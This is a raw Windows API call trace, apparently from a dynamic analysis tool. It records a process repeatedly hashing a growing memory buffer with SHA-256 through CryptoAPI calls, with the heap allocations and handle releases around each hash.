	[0197.014] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.014] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.014] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0197.014] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c228
	[0197.014] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c228, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c228, pdwDataLen=0x128aac) returned 1
	[0197.014] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.014] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.014] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.015] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.015] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0197.015] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c250
	[0197.015] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c250, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c250, pdwDataLen=0x128aac) returned 1
	[0197.015] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.015] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.015] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.015] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.015] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0197.015] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c278
	[0197.015] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c278, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c278, pdwDataLen=0x128aac) returned 1
	[0197.015] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.015] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.015] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.016] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.016] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0197.016] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c2a0
	[0197.016] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c2a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c2a0, pdwDataLen=0x128aac) returned 1
	[0197.016] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.016] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.016] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.016] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.016] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0197.016] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c2c8
	[0197.016] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c2c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c2c8, pdwDataLen=0x128aac) returned 1
	[0197.016] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.016] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.017] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.017] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.017] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0197.017] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c2f0
	[0197.017] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c2f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c2f0, pdwDataLen=0x128aac) returned 1
	[0197.017] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.017] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.017] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.017] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.017] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0197.017] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c318
	[0197.017] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c318, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c318, pdwDataLen=0x128aac) returned 1
	[0197.017] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.018] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.018] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.018] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.018] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0197.018] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c340
	[0197.018] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c340, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c340, pdwDataLen=0x128aac) returned 1
	[0197.018] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.018] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.018] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.018] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.018] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0197.018] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c368
	[0197.018] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c368, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c368, pdwDataLen=0x128aac) returned 1
	[0197.019] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.019] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.019] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2754be0) returned 1
	[0197.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2754be0
	[0197.019] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.019] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.019] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0197.019] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c390
	[0197.019] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c390, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c390, pdwDataLen=0x128aac) returned 1
	[0197.019] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.019] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.019] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.019] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.019] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0197.019] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c3b8
	[0197.019] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c3b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c3b8, pdwDataLen=0x128aac) returned 1
	[0197.020] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.020] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.020] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.020] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.020] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0197.020] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c3e0
	[0197.020] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c3e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c3e0, pdwDataLen=0x128aac) returned 1
	[0197.020] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.020] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.020] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.020] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.020] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0197.020] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c408
	[0197.020] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c408, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c408, pdwDataLen=0x128aac) returned 1
	[0197.020] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.020] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.021] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.021] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.021] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0197.021] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c430
	[0197.021] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c430, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c430, pdwDataLen=0x128aac) returned 1
	[0197.021] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.021] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.021] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.021] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.021] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0197.021] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c458
	[0197.021] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c458, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c458, pdwDataLen=0x128aac) returned 1
	[0197.021] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.021] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.021] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.022] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.022] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0197.022] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c480
	[0197.022] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c480, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c480, pdwDataLen=0x128aac) returned 1
	[0197.022] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.022] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.022] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.022] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.022] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0197.022] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c4a8
	[0197.022] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c4a8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c4a8, pdwDataLen=0x128aac) returned 1
	[0197.022] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.022] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.022] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.023] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.023] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0197.023] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c4d0
	[0197.023] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c4d0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c4d0, pdwDataLen=0x128aac) returned 1
	[0197.023] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.023] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.023] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.023] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.023] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0197.023] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c4f8
	[0197.023] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c4f8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c4f8, pdwDataLen=0x128aac) returned 1
	[0197.023] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.023] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.023] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.024] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.024] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0197.024] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c520
	[0197.024] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c520, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c520, pdwDataLen=0x128aac) returned 1
	[0197.024] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.024] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.024] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.024] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.024] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0197.024] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c548
	[0197.024] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c548, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c548, pdwDataLen=0x128aac) returned 1
	[0197.024] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.024] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.024] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.025] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.025] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0197.025] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c570
	[0197.025] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c570, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c570, pdwDataLen=0x128aac) returned 1
	[0197.025] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.025] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.025] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.025] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.025] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0197.025] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c598
	[0197.025] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c598, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c598, pdwDataLen=0x128aac) returned 1
	[0197.025] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.025] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.025] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.026] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.026] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0197.026] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c5c0
	[0197.026] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c5c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c5c0, pdwDataLen=0x128aac) returned 1
	[0197.026] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.026] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.026] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.026] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.026] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0197.026] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c5e8
	[0197.026] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c5e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c5e8, pdwDataLen=0x128aac) returned 1
	[0197.026] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.026] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.026] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
